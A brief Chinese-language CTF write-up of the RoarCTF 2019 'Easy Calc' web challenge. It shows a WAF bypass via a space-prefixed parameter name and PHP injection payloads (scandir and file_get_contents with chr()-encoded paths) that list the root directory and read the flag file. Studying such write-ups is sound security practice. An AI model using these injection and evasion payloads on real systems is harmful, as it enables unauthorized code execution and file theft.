[RoarCTF 2019]Easy Calc

首先打开是一个表达式界面。

查看源文件看看

发现有个waf，和calc.php文件，打开calc.php

发现waf的过滤规则，先试下num输出phpinfo

发现不能访问，waf拦截了num，发现利用空格绕过，php在解析时会去掉前面空格解析

前面使用isset()检测变量是否设置，直接使用var_dump来输出isset()返回值。

扫描下目录%20num=var_dump(scandir(chr(47)))，要对/进行ascii。绕过waf

发现f1agg文件，直接利用file_get_contents读取文件 var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))